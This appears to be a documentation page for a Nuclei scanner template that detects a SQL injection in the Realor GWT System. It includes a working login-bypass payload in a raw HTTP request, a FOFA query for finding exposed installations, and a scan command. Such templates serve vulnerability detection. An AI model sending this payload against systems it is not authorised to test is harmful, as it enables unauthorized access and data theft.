Skip to content

Realor GWT System SQL injection

ID: realor-gwt-system-sqli

Severity: high

Author: SleepingBag945

Tags: realor,sqli

Realor GWT System system improperly handles the security of data passed by users, resulting in a SQL injection vulnerability. Remote and unauthorized attackers can use this vulnerability to obtain sensitive information in the database, and can further write webshell backdoors. Access, the attacker can execute arbitrary malicious code on the target server and gain system privileges.

id: realor-gwt-system-sqli
info:
name: Realor GWT System SQL injection
author: SleepingBag945
severity: high
description: |
Realor GWT System system improperly handles the security of data passed by users, resulting in a SQL injection vulnerability. Remote and unauthorized attackers can use this vulnerability to obtain sensitive information in the database, and can further write webshell backdoors. Access, the attacker can execute arbitrary malicious code on the target server and gain system privileges.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/realor-gwt-system-sql-injection.yaml
metadata:
verified: "true"
max-request: 2
fofa-query: app="REALOR-天翼应用虚拟化系统"
tags: realor,sqli
http:
- raw:
- |
GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1
Host: {{Hostname}}
- |
GET /Board.XGI HTTP/1.1
Cookie: PHPSESSID={{cookie}}
Host: {{Hostname}}
extractors:
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
matchers:
- type: dsl
dsl:
- 'contains(body_1,"CustomInfo") && contains(header_1,"PHPSESSID")'
- 'contains(body_2,"src=\"custom/")'
condition: and
# digest: 4a0a004730450220577db5ad3cdfddbd82f6e72a94a4608997b9918ff23f2e5a77fd12f8361df1930221009bc9370f1e3bf03ca80ed80de993eaad2fe7d751ff276f31c88997ad36abd002:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/realor/realor-gwt-system-sqli.yaml"

View on Github